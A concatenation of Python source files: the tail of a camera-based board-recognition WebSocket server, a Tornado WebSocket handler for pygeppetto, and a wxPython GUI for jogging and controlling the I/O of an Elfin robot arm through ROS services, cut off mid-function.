return globals.camera.read()
def notify_board_not_recognized(self, board_snapshot):
"""
Notifies client that board has not been recognized for an amount of time. If corner information is given
from board recognizer it returns a list of unrecognized corners [topLeft, topRight, bottomLeft, bottomRight].
:param board_snapshot Board snapshot
"""
if board_snapshot is not None and board_snapshot.missing_corners is not None:
self.send_message("BOARD_NOT_RECOGNIZED", "recognizeBoard",
{"unrecognizedCorners": board_snapshot.missing_corners})
else:
self.send_message("BOARD_NOT_RECOGNIZED", "recognizeBoard", {})
# Output debug image
if globals.debug and board_snapshot is not None:
cv2.imwrite("debug/board_not_recognized_{0}.png".format(time.time()), board_snapshot.camera_image)
def notify_board_recognized(self):
"""
Notifies client that board has again been recognized.
"""
self.send_message("BOARD_RECOGNIZED", "recognizeBoard", {})
def send_message(self, result, action, payload={}, request_id=None):
"""
Sends a new message to the client.
:param result Result code
:param action Client action from which the message originates
:param payload Payload
:param request_id: Request ID. If none given, random ID is generated
"""
message = {"result": result,
"action": action,
"payload": payload,
"requestId": request_id if request_id is not None else self.random_id()}
self.sendMessage(json.dumps(message, ensure_ascii=False, encoding='utf8'))
print("Sent message: %s" % message)
def handleConnected(self):
print self.address, 'connected'
def handleClose(self):
self.reset_reporters({})
print self.address, 'closed'
def random_id(self):
while True:
reporter_id = randint(0, 100000)
if reporter_id not in self.reporters:
return reporter_id
def reporter_run(self):
board_recognized_time = time.time()
while True:
# Sleep a while
time.sleep(0.01)
try:
# Read image from camera
if globals.camera is None:
continue
image = globals.camera.read()
if image is None:
continue
# Do all in a lock to force sequential execution of handleMessage above
with self.busy_lock:
# Recognize board
if globals.board_descriptor is not None:
globals.board_descriptor.snapshot = globals.board_recognizer.find_board(image, globals.board_descriptor)
# Board not recognized
if not globals.board_descriptor.is_recognized():
# Notify client that board is not recognized
if board_recognized_time is not None and time.time() > board_recognized_time + globals.board_not_recognized_notify_delay:
self.notify_board_not_recognized(globals.board_descriptor.snapshot)
board_recognized_time = None
#cv2.imwrite("board.png", image)
else:
#cv2.imwrite("board.png", globals.board_descriptor.snapshot.board_image())
# Notify client that board is recognized
if board_recognized_time is None:
self.notify_board_recognized()
board_recognized_time = time.time()
# Update board areas
if globals.board_descriptor.is_recognized():
for (_, board_area) in self.board_areas.copy().iteritems():
board_area.update_stability_score()
# Run all reporters
reporter_ids_to_remove = []
for (reporter_id, reporter) in self.reporters.copy().iteritems():
# Run reporter
reporter.run_iteration()
# Check if stopped
if reporter.stopped:
reporter_ids_to_remove.append(reporter_id)
# Remove stopped reporters
for reporter_id in reporter_ids_to_remove:
self.reporters.pop(reporter_id)
except Exception, e:
print("Exception in reporter loop: %s" % str(e))
traceback.print_exc(file=sys.stdout)
def request_id_from_payload(self, payload):
"""
Returns the request ID from the payload. If no request ID is given, a random ID is generated.
:param payload: Payload
:return: Request ID from payload, or random if none given
"""
return payload["requestId"] if "requestId" in payload else self.random_id()
def start_server():
print("Starting server...")
server = SimpleWebSocketServer('', 9001, Server)
server.serveforever()
|
websocket_connection.py
|
"""
Class used to process Web Socket Connections. Messages sent from the connecting clients, web socket connections,
are received in here.
"""
from __future__ import print_function
import gzip
import json
import logging
import time
from jupyter_geppetto import settings
from pyecore.ecore import EList
from pygeppetto.api.inbound_messages import InboundMessages
from pygeppetto.api.message_handler import GeppettoMessageHandler
from pygeppetto.managers import GeppettoManager
from tornado.websocket import WebSocketHandler
MANAGERS_HANGING_TIME_SECONDS = 60 * 5
class TornadoGeppettoWebSocketHandler(WebSocketHandler, GeppettoMessageHandler):
hanging_managers = {}
def open(self):
# 1 -> Send the connection
logging.info('Open websocket')
self.sendClientId()
# 2 -> Check user privileges
self.sendPrivileges()
def send_message_data(self, msg_data):
msg = json.dumps(msg_data)
if settings.websocket.compression_enabled and len(msg) > settings.websocket.min_message_length_for_compression:
self.write_message(gzip.compress(bytes(msg, 'utf-8')), binary=True)
else:
self.write_message(msg)
def handle_message(self, payload):
msg_type = self.get_message_type(payload)
if msg_type == InboundMessages.RECONNECT:
connection_id = json.loads(payload['data'])['connectionID']
self.recover_manager(connection_id)
super().handle_message(payload)
def on_message(self, message):
self.handle_message(json.loads(message))
def on_close(self):
self.cleanup_manager(self.scope_id)
logging.info("Closed Connection ...")
def convertRunnableQueriesDataTransferModel(self, runnableQueries):
""" generated source for method convertRunnableQueriesDataTransferModel """
runnableQueriesEMF = EList('')
from pygeppetto.model.datasources.datasources import RunnableQuery
for dt in runnableQueries:
rqEMF = RunnableQuery(targetVariablePath=dt.targetVariablePath, queryPath=dt.queryPath)
runnableQueriesEMF.append(rqEMF)
return runnableQueriesEMF
def recover_manager(self, connection_id):
if GeppettoManager.has_instance(connection_id):
self.geppettoManager = GeppettoManager.replace_instance(connection_id, self.scope_id)
@classmethod
def cleanup_manager(cls, client_id):
from threading import Thread
def clean_up():
time.sleep(MANAGERS_HANGING_TIME_SECONDS)
GeppettoManager.cleanup_instance(client_id)
Thread(target=clean_up).start()
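# A minimal sketch of mounting this handler in a Tornado application (the URL pattern and
# port are assumptions, not taken from this project's configuration):
#
#   import tornado.web
#   import tornado.ioloop
#
#   app = tornado.web.Application([(r'/ws', TornadoGeppettoWebSocketHandler)])
#   app.listen(8000)
#   tornado.ioloop.IOLoop.current().start()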
|
elfin_gui.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 28 12:18:05 2017
@author: Cong Liu
Software License Agreement (BSD License)
Copyright (c) 2017, Han's Robot Co., Ltd.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the copyright holders nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
# author: Cong Liu
from __future__ import division
import rospy
import math
import os # 20201209: add os path
import tf
import moveit_commander
from std_msgs.msg import Bool, String
from std_srvs.srv import SetBool, SetBoolRequest, SetBoolResponse
from elfin_robot_msgs.srv import SetString, SetStringRequest, SetStringResponse
from elfin_robot_msgs.srv import SetInt16, SetInt16Request
from elfin_robot_msgs.srv import *
import wx
from sensor_msgs.msg import JointState
from actionlib import SimpleActionClient
from control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal
import threading
import dynamic_reconfigure.client
class MyFrame(wx.Frame):
def __init__(self,parent,id):
the_size=(700, 720) # height from 550 change to 700
wx.Frame.__init__(self,parent,id,'Elfin Control Panel',pos=(250,100))
self.panel=wx.Panel(self)
font=self.panel.GetFont()
font.SetPixelSize((12, 24))
self.panel.SetFont(font)
self.listener = tf.TransformListener()
self.robot=moveit_commander.RobotCommander()
self.scene=moveit_commander.PlanningSceneInterface()
self.group=moveit_commander.MoveGroupCommander('elfin_arm')
self.controller_ns='elfin_arm_controller/'
self.elfin_driver_ns='elfin_ros_control/elfin/'
self.elfin_IO_ns='elfin_ros_control/elfin/io_port1/' # 20201126: add IO ns
self.call_read_do_req = ElfinIODReadRequest()
self.call_read_di_req = ElfinIODReadRequest()
self.call_read_do_req.data = True
self.call_read_di_req.data = True
self.call_read_do = rospy.ServiceProxy(self.elfin_IO_ns+'read_do',ElfinIODRead)
self.call_read_di = rospy.ServiceProxy(self.elfin_IO_ns+'read_di',ElfinIODRead)
# 20201126: add service for write_do
self.call_write_DO=rospy.ServiceProxy(self.elfin_IO_ns+'write_do',ElfinIODWrite)
self.elfin_basic_api_ns='elfin_basic_api/'
self.joint_names=rospy.get_param(self.controller_ns+'joints', [])
self.ref_link_name=self.group.get_planning_frame()
self.end_link_name=self.group.get_end_effector_link()
self.ref_link_lock=threading.Lock()
self.end_link_lock=threading.Lock()
self.DO_btn_lock = threading.Lock() # 20201208: add the threading lock
self.DI_show_lock = threading.Lock()
self.js_display=[0]*6 # joint_states
self.jm_button=[0]*6 # joints_minus
self.jp_button=[0]*6 # joints_plus
self.js_label=[0]*6 # joint_states
self.ps_display=[0]*6 # pcs_states
self.pm_button=[0]*6 # pcs_minus
self.pp_button=[0]*6 # pcs_plus
self.ps_label=[0]*6 # pcs_states
# 20201208: add the button array
self.DO_btn_display=[0]*4 # DO states
self.DI_display=[0]*4 # DI states
self.LED_display=[0]*4 # LED states
self.End_btn_display=[0]*4 # end button states
self.btn_height=370 # 20201126: from 390 change to 370
self.btn_path = os.path.dirname(os.path.realpath(__file__)) # 20201209: get the elfin_gui.py path
btn_lengths=[]
self.DO_DI_btn_length=[0,92,157,133] # 20201209: the lengths come from the Servo On, Servo Off, Home and Stop buttons
self.btn_interstice=22 # 20201209: come from btn_interstice
self.display_init()
self.key=[]
self.DO_btn=[0,0,0,0,0,0,0,0] # DO state, first four bits is DO, the other is LED
self.DI_show=[0,0,0,0,0,0,0,0] # DI state, first four bits is DI, the other is the end button
self.power_on_btn=wx.Button(self.panel, label=' Servo On ', name='Servo On',
pos=(20, self.btn_height))
btn_lengths.append(self.power_on_btn.GetSize()[0])
btn_total_length=btn_lengths[0]
self.power_off_btn=wx.Button(self.panel, label=' Servo Off ', name='Servo Off')
btn_lengths.append(self.power_off_btn.GetSize()[0])
btn_total_length+=btn_lengths[1]
self.reset_btn=wx.Button(self.panel, label=' Clear Fault ', name='Clear Fault')
btn_lengths.append(self.reset_btn.GetSize()[0])
btn_total_length+=btn_lengths[2]
self.home_btn=wx.Button(self.panel, label='Home', name='home_btn')
btn_lengths.append(self.home_btn.GetSize()[0])
btn_total_length+=btn_lengths[3]
self.stop_btn=wx.Button(self.panel, label='Stop', name='Stop')
btn_lengths.append(self.stop_btn.GetSize()[0])
btn_total_length+=btn_lengths[4]
self.btn_interstice=(550-btn_total_length)/4
btn_pos_tmp=btn_lengths[0]+self.btn_interstice+20 # 20201126: 20:init length + btn0 length + btn_inter:gap
self.power_off_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[1]+self.btn_interstice
self.reset_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[2]+self.btn_interstice
self.home_btn.SetPosition((btn_pos_tmp, self.btn_height))
btn_pos_tmp+=btn_lengths[3]+self.btn_interstice
self.stop_btn.SetPosition((btn_pos_tmp, self.btn_height))
self.servo_state_label=wx.StaticText(self.panel, label='Servo state:',
pos=(590, self.btn_height-10))
self.servo_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+10))
self.servo_state=bool()
self.servo_state_lock=threading.Lock()
self.fault_state_label=wx.StaticText(self.panel, label='Fault state:',
pos=(590, self.btn_height+60))
self.fault_state_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', pos=(600, self.btn_height+80))
self.fault_state=bool()
self.fault_state_lock=threading.Lock()
# 20201209: add the description of end button
self.end_button_state_label=wx.StaticText(self.panel, label='END Button\n state',
pos=(555,self.btn_height+160))
self.reply_show_label=wx.StaticText(self.panel, label='Result:',
pos=(20, self.btn_height+260)) # 20201126: btn_height from 120 change to 260.
self.reply_show=wx.TextCtrl(self.panel, style=(wx.TE_CENTER |wx.TE_READONLY),
value='', size=(670, 30), pos=(20, self.btn_height+280))# 20201126: btn_height from 140 change to 280.
link_textctrl_length=(btn_pos_tmp-40)/2
self.ref_links_show_label=wx.StaticText(self.panel, label='Ref. link:',
pos=(20, self.btn_height+210)) # 20201126: btn_height from 60 change to 210.
self.ref_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.ref_link_name, size=(link_textctrl_length, 30),
pos=(20, self.btn_height+230)) # 20201126: btn_height from 80 change to 230.
self.end_link_show_label=wx.StaticText(self.panel, label='End link:',
pos=(link_textctrl_length+30, self.btn_height+210))# 20201126: btn_height from 80 change to 200.
self.end_link_show=wx.TextCtrl(self.panel, style=(wx.TE_READONLY),
value=self.end_link_name, size=(link_textctrl_length, 30),
pos=(link_textctrl_length+30, self.btn_height+230))
self.set_links_btn=wx.Button(self.panel, label='Set links', name='Set links')
self.set_links_btn.SetPosition((btn_pos_tmp, self.btn_height+230)) # 20201126: btn_height from 75 change to 220.
# the variables about velocity scaling
velocity_scaling_init=rospy.get_param(self.elfin_basic_api_ns+'velocity_scaling',
default=0.1)
default_velocity_scaling=str(round(velocity_scaling_init, 2))
self.velocity_setting_label=wx.StaticText(self.panel, label='Velocity Scaling',
pos=(20, self.btn_height-55)) # 20201126: btn_height from 70 change to 55
self.velocity_setting=wx.Slider(self.panel, value=int(velocity_scaling_init*100),
minValue=1, maxValue=100,
style = wx.SL_HORIZONTAL,
size=(500, 30),
pos=(45, self.btn_height-35)) # 20201126: btn_height from 70 change to 35
self.velocity_setting_txt_lower=wx.StaticText(self.panel, label='1%',
pos=(20, self.btn_height-35)) # 20201126: btn_height from 45 change to 35
self.velocity_setting_txt_upper=wx.StaticText(self.panel, label='100%',
pos=(550, self.btn_height-35))# 20201126: btn_height from 45 change to 35
self.velocity_setting_show=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER|wx.TE_READONLY),
value=default_velocity_scaling,
pos=(600, self.btn_height-45))# 20201126: btn_height from 55 change to 45
self.velocity_setting.Bind(wx.EVT_SLIDER, self.velocity_setting_cb)
self.teleop_api_dynamic_reconfig_client=dynamic_reconfigure.client.Client(self.elfin_basic_api_ns,
config_callback=self.basic_api_reconfigure_cb)
self.dlg=wx.Dialog(self.panel, title='message')
self.dlg.Bind(wx.EVT_CLOSE, self.closewindow)
self.dlg_panel=wx.Panel(self.dlg)
self.dlg_label=wx.StaticText(self.dlg_panel, label='hello', pos=(15, 15))
self.set_links_dlg=wx.Dialog(self.panel, title='Set links', size=(400, 100))
self.set_links_dlg_panel=wx.Panel(self.set_links_dlg)
self.sld_ref_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 20), size=(link_textctrl_length, 30))
self.sld_end_link_show=wx.TextCtrl(self.set_links_dlg_panel, style=wx.TE_PROCESS_ENTER,
value='', pos=(20, 70), size=(link_textctrl_length, 30))
self.sld_set_ref_link_btn=wx.Button(self.set_links_dlg_panel, label='Update ref. link',
name='Update ref. link')
self.sld_set_ref_link_btn.SetPosition((link_textctrl_length+30, 15))
self.sld_set_end_link_btn=wx.Button(self.set_links_dlg_panel, label='Update end link',
name='Update end link')
self.sld_set_end_link_btn.SetPosition((link_textctrl_length+30, 65))
self.set_links_dlg.SetSize((link_textctrl_length+self.sld_set_ref_link_btn.GetSize()[0]+50, 120))
self.call_teleop_joint=rospy.ServiceProxy(self.elfin_basic_api_ns+'joint_teleop',
SetInt16)
self.call_teleop_joint_req=SetInt16Request()
self.call_teleop_cart=rospy.ServiceProxy(self.elfin_basic_api_ns+'cart_teleop',
SetInt16)
self.call_teleop_cart_req=SetInt16Request()
self.call_teleop_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_teleop_stop_req=SetBoolRequest()
self.call_stop=rospy.ServiceProxy(self.elfin_basic_api_ns+'stop_teleop',
SetBool)
self.call_stop_req=SetBoolRequest()
self.call_stop_req.data=True
self.stop_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_stop,
rq=self.call_stop_req :
self.call_set_bool_common(evt, cl, rq))
self.call_reset=rospy.ServiceProxy(self.elfin_driver_ns+'clear_fault', SetBool)
self.call_reset_req=SetBoolRequest()
self.call_reset_req.data=True
self.reset_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_reset,
rq=self.call_reset_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_on=rospy.ServiceProxy(self.elfin_basic_api_ns+'enable_robot', SetBool)
self.call_power_on_req=SetBoolRequest()
self.call_power_on_req.data=True
self.power_on_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_on,
rq=self.call_power_on_req :
self.call_set_bool_common(evt, cl, rq))
self.call_power_off=rospy.ServiceProxy(self.elfin_basic_api_ns+'disable_robot', SetBool)
self.call_power_off_req=SetBoolRequest()
self.call_power_off_req.data=True
self.power_off_btn.Bind(wx.EVT_BUTTON,
lambda evt, cl=self.call_power_off,
rq=self.call_power_off_req :
self.call_set_bool_common(evt, cl, rq))
self.call_move_homing=rospy.ServiceProxy(self.elfin_basic_api_ns+'home_teleop',
SetBool)
self.call_move_homing_req=SetBoolRequest()
self.call_move_homing_req.data=True
self.home_btn.Bind(wx.EVT_LEFT_DOWN,
lambda evt, cl=self.call_move_homing,
rq=self.call_move_homing_req :
self.call_set_bool_common(evt, cl, rq))
self.home_btn.Bind(wx.EVT_LEFT_UP,
lambda evt, mark=100:
self.release_button(evt, mark) )
self.call_set_ref_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_reference_link', SetString)
self.call_set_end_link=rospy.ServiceProxy(self.elfin_basic_api_ns+'set_end_link', SetString)
self.set_links_btn.Bind(wx.EVT_BUTTON, self.show_set_links_dialog)
self.sld_set_ref_link_btn.Bind(wx.EVT_BUTTON, self.update_ref_link)
self.sld_set_end_link_btn.Bind(wx.EVT_BUTTON, self.update_end_link)
self.sld_ref_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_ref_link)
self.sld_end_link_show.Bind(wx.EVT_TEXT_ENTER, self.update_end_link)
self.action_client=SimpleActionClient(self.controller_ns+'follow_joint_trajectory',
FollowJointTrajectoryAction)
self.action_goal=FollowJointTrajectoryGoal()
self.action_goal.trajectory.joint_names=self.joint_names
self.SetMinSize(the_size)
self.SetMaxSize(the_size)
def display_init(self):
js_pos=[20, 20]
js_btn_length=[70, 70, 61, 80]
js_distances=[10, 20, 10, 26]
dis_h=50
for i in xrange(len(self.js_display)):
self.jp_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' +',
pos=(js_pos[0],
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=js_btn_length[0]+js_distances[0]
self.jp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_joints(evt, mark) )
self.jp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.jm_button[i]=wx.Button(self.panel,
label='J'+str(i+1)+' -',
pos=(js_pos[0]+dis_tmp,
js_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=js_btn_length[1]+js_distances[1]
self.jm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_joints(evt, mark) )
self.jm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_js_label=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_label[i]=wx.StaticText(self.panel,
label='J'+str(i+1)+'/deg:',
pos=pos_js_label)
self.js_label[i].SetPosition((pos_js_label[0], pos_js_label[1]+abs(40-self.js_label[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[2]+js_distances[2]
pos_js_display=(js_pos[0]+dis_tmp, js_pos[1]+(5-i)*dis_h)
self.js_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value=' 0000.00 ',
pos=pos_js_display)
self.js_display[i].SetPosition((pos_js_display[0], pos_js_display[1]+abs(40-self.js_display[i].GetSize()[1])/2))
dis_tmp+=js_btn_length[3]+js_distances[3]
ps_pos=[js_pos[0]+dis_tmp, 20]
ps_btn_length=[70, 70, 53, 80]
ps_distances=[10, 20, 10, 20]
pcs_btn_label=['X', 'Y', 'Z', 'Rx', 'Ry', 'Rz']
pcs_label=['X', 'Y', 'Z', 'R', 'P', 'Y']
unit_label=['/mm:', '/mm:', '/mm:', '/deg:', '/deg:', '/deg:']
for i in xrange(len(self.ps_display)):
self.pp_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' +',
pos=(ps_pos[0],
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp=ps_btn_length[0]+ps_distances[0]
self.pp_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=i+1 : self.teleop_pcs(evt, mark) )
self.pp_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=i+1 : self.release_button(evt, mark) )
self.pm_button[i]=wx.Button(self.panel,
label=pcs_btn_label[i]+' -',
pos=(ps_pos[0]+dis_tmp,
ps_pos[1]+(5-i)*dis_h),
size=(70,40))
dis_tmp+=ps_btn_length[1]+ps_distances[1]
self.pm_button[i].Bind(wx.EVT_LEFT_DOWN,
lambda evt, mark=-1*(i+1) : self.teleop_pcs(evt, mark) )
self.pm_button[i].Bind(wx.EVT_LEFT_UP,
lambda evt, mark=-1*(i+1) : self.release_button(evt, mark) )
pos_ps_label=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_label[i]=wx.StaticText(self.panel,
label=pcs_label[i]+unit_label[i],
pos=pos_ps_label)
self.ps_label[i].SetPosition((pos_ps_label[0], pos_ps_label[1]+abs(40-self.ps_label[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[2]+ps_distances[2]
pos_ps_display=(ps_pos[0]+dis_tmp, ps_pos[1]+(5-i)*dis_h)
self.ps_display[i]=wx.TextCtrl(self.panel,
style=(wx.TE_CENTER |wx.TE_READONLY),
value='',
pos=pos_ps_display)
self.ps_display[i].SetPosition((pos_ps_display[0], pos_ps_display[1]+abs(40-self.ps_display[i].GetSize()[1])/2))
dis_tmp+=ps_btn_length[3]+ps_distances[3]
        # 20201209: add the DO, LED, DI and End buttons.
for i in xrange(len(self.DO_btn_display)):
self.DO_btn_display[i]=wx.Button(self.panel,label='DO'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+40))
self.DO_btn_display[i].Bind(wx.EVT_BUTTON,
lambda evt,marker=i,cl=self.call_write_DO :
self.call_write_DO_command(evt,marker,cl))
self.DI_display[i]=wx.TextCtrl(self.panel, style=(wx.TE_CENTER | wx.TE_READONLY), value='DI'+str(i),
size=(self.DO_btn_display[i].GetSize()),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+80))
self.LED_display[i]=wx.Button(self.panel,label='LED'+str(i),
pos=(20+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,self.btn_height+120))
self.LED_display[i].Bind(wx.EVT_BUTTON,
lambda evt, marker=4+i, cl=self.call_write_DO :
self.call_write_DO_command(evt, marker,cl))
png=wx.Image(self.btn_path+'/btn_icon/End_btn'+str(i)+'_low.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.End_btn_display[i]=wx.StaticBitmap(self.panel,-1,png,
pos=(40+(self.DO_DI_btn_length[i]+self.btn_interstice)*i,
self.btn_height+160))
def velocity_setting_cb(self, event):
current_velocity_scaling=self.velocity_setting.GetValue()*0.01
self.teleop_api_dynamic_reconfig_client.update_configuration({'velocity_scaling': current_velocity_scaling})
wx.CallAfter(self.update_velocity_scaling_show, current_velocity_scaling)
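        # Example (illustrative values): a slider reading of 50 maps to
        # velocity_scaling=0.5, which is pushed to the basic API through dynamic
        # reconfigure and then echoed back into the read-only percentage display.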
def basic_api_reconfigure_cb(self, config):
if self.velocity_setting_show.GetValue()!=config.velocity_scaling:
self.velocity_setting.SetValue(int(config.velocity_scaling*100))
wx.CallAfter(self.update_velocity_scaling_show, config.velocity_scaling)
def action_stop(self):
self.action_client.wait_for_server(timeout=rospy.Duration(secs=0.5))
self.action_goal.trajectory.header.stamp.secs=0
self.action_goal.trajectory.header.stamp.nsecs=0
self.action_goal.trajectory.points=[]
self.action_client.send_goal(self.action_goal)
def teleop_joints(self,event,mark):
self.call_teleop_joint_req.data=mark
resp=self.call_teleop_joint.call(self.call_teleop_joint_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def teleop_pcs(self,event,mark):
self.call_teleop_cart_req.data=mark
resp=self.call_teleop_cart.call(self.call_teleop_cart_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def release_button(self, event, mark):
self.call_teleop_stop_req.data=True
resp=self.call_teleop_stop.call(self.call_teleop_stop_req)
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def call_set_bool_common(self, event, client, request):
btn=event.GetEventObject()
check_list=['Servo On', 'Servo Off', 'Clear Fault']
# Check servo state
if btn.GetName()=='Servo On':
servo_enabled=bool()
if self.servo_state_lock.acquire():
servo_enabled=self.servo_state
self.servo_state_lock.release()
if servo_enabled:
resp=SetBoolResponse()
resp.success=False
resp.message='Robot is already enabled'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check fault state
if btn.GetName()=='Clear Fault':
fault_flag=bool()
if self.fault_state_lock.acquire():
fault_flag=self.fault_state
self.fault_state_lock.release()
if not fault_flag:
resp=SetBoolResponse()
resp.success=False
resp.message='There is no fault now'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
return
# Check if the button is in check list
if btn.GetName() in check_list:
self.show_message_dialog(btn.GetName(), client, request)
else:
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
            except rospy.ServiceException as e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
event.Skip()
def thread_bg(self, msg, client, request):
wx.CallAfter(self.show_dialog)
if msg=='Servo Off':
self.action_stop()
rospy.sleep(1)
try:
resp=client.call(request)
wx.CallAfter(self.update_reply_show, resp)
        except rospy.ServiceException as e:
resp=SetBoolResponse()
resp.success=False
resp.message='no such service in simulation'
wx.CallAfter(self.update_reply_show, resp)
wx.CallAfter(self.destroy_dialog)
# 20201201: add function for processing value to DO_btn
def process_DO_btn(self,value):
if self.DO_btn_lock.acquire():
for i in range(0,8):
tmp = (value >> (12 + i)) & 0x01
self.DO_btn[i]=tmp
self.DO_btn_lock.release()
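        # Layout assumed by the shift above: the digital outputs occupy bits 12-19 of
        # the returned word, e.g. a value of 0x5000 (0b0101 << 12) yields DO0=1,
        # DO1=0, DO2=1, DO3=0.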
# 20201201: add function to read DO.
def call_read_DO_command(self):
try:
client = self.call_read_do
val = client.call(self.call_read_do_req).digital_input
self.process_DO_btn(val)
        except rospy.ServiceException as e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201201: add function for processing value
def process_DI_btn(self,value):
if self.DI_show_lock.acquire():
if value > 0:
for i in range(0,8):
tmp = (value >> (16 + i)) & 0x01
self.DI_show[i]=tmp
else:
self.DI_show = [0,0,0,0,0,0,0,0]
self.DI_show_lock.release()
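        # The inputs sit one byte higher (bits 16-23), e.g. a value of 0x30000 gives
        # DI0=1, DI1=1 and DI2..DI7=0, while a value of 0 clears all eight entries.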
# 20201201: add function to read DI.
def call_read_DI_command(self):
try:
client = self.call_read_di
val = client.call(self.call_read_di_req).digital_input
self.process_DI_btn(val)
        except rospy.ServiceException as e:
resp=ElfinIODReadResponse()
resp.digital_input=0x0000
# 20201202: add function to read DO and DI.
def monitor_DO_DI(self,evt):
self.call_read_DI_command()
self.call_read_DO_command()
# 20201126: add function to write DO.
def call_write_DO_command(self, event, marker, client):
self.justification_DO_btn(marker)
request = 0
try:
self.DO_btn_lock.acquire()
for i in range(0,8):
request = request + self.DO_btn[i]*pow(2,i)
resp=client.call(request << 12)
self.DO_btn_lock.release()
        except rospy.ServiceException as e:
self.DO_btn_lock.release()
resp=ElfinIODWriteResponse()
resp.success=False
self.justification_DO_btn(marker)
rp=SetBoolResponse()
rp.success=False
rp.message='no such service for DO control'
wx.CallAfter(self.update_reply_show, rp)
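        # Worked example: toggling DO2 while DO_btn == [1,0,0,0,0,0,0,0] gives
        # [1,0,1,0,0,0,0,0], request = 2**0 + 2**2 = 5, and the service is called
        # with 5 << 12 = 0x5000 - the same bit layout process_DO_btn() reads back.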
# 20201127: add justification to DO_btn
def justification_DO_btn(self,marker):
self.DO_btn_lock.acquire()
if 0 == self.DO_btn[marker]:
self.DO_btn[marker] = 1
else:
self.DO_btn[marker] = 0
self.DO_btn_lock.release()
# 20201201: add function to set DO_btn colour
def set_DO_btn_colour(self):
self.DO_btn_lock.acquire()
for i in range(0,4):
if 0 == self.DO_btn[i]:
self.DO_btn_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DO_btn_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DO_btn_lock.release()
# 20201201: add function to set DI_show colour
def set_DI_show_colour(self):
self.DI_show_lock.acquire()
for i in range(0,4):
if 0 == self.DI_show[i]:
self.DI_display[i].SetBackgroundColour(wx.NullColour)
else:
self.DI_display[i].SetBackgroundColour(wx.Colour(200,225,200))
self.DI_show_lock.release()
# 20201207: add function to set LED colour
def set_LED_show_colour(self):
self.DO_btn_lock.acquire()
